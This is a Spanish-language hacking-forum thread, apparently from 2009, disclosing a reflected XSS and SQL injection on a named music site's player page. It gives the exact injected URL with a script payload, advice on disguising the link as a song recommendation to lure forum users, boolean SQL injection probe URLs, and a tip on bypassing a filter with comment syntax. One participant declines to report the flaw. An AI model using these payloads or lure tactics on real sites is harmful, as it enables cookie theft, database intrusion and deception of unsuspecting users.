Por lo general no posteo xss pero este en particular me parece que es especialmente grave por la ingenieria social que se le puede aplicar, ya que es en un sitio de musica online y es facil decir "Oh mira que cancion tan buena" :¬¬

Esta reportado 11/08/2009

El xss esta en la pagina donde se abre el reproductor portable...

Yo lo llamaria inyeccion html :¬¬ pero para que WHK no reclame lo llamaremos xss xD

por ejemplo tenemos una cancion cualquiera:

http://www.goear.com/listenwin.php?v=78707c5

le agregamos nuestro codigo malo xD

http://www.goear.com/listenwin.php?v=78707c5'><script>alert('te robamos tus cookies... gracias ')</script>

Que en el navegador se vera:

http://www.goear.com/listenwin.php?v=78707c5'%3E%3Cscript%3Ealert('te%20robamos%20tus%20cookies...%20gracias%20;)')%3C/script%3E

y que podemos disfrazar en foros asi

http://www.goear.com/listenwin.php?v=78707c5 y decir "esta cancion es genial"

No se cargara la cancion pero la gente no dudara a menos que vea la direccion xD en fin

Saludos.

PD: Solo se le agrego un alert pero la gente puede ser un poco mas ingeniosa, si no quieren que la direccion aparezca como http://www.goear.com/listenwin.php?v=78707c5'> solo quitenlo, se ejecuta igual nuestra inyec... XSS ¬¬

genial!, lo agregaré al recopilarorio de advisories:
http://foro.elhacker.net/nivel_web/temas_mas_destacados_fallas_y_explotaciones_a_nivel_web_actualizado_301009-t244090.0.html

Agregale un SQLI 

http://www.goear.com/listenwin.php?v=78707c5'+and+1=1+--+
http://www.goear.com/listenwin.php?v=78707c5'+and+1=2+--+
 

No se para que tanto  desordern en el order tan solo con el /**/ te saltas el filtro Lo malo es que el Select te lo jode

Yo no reporto nada Si alguien quiere reportarlo es libre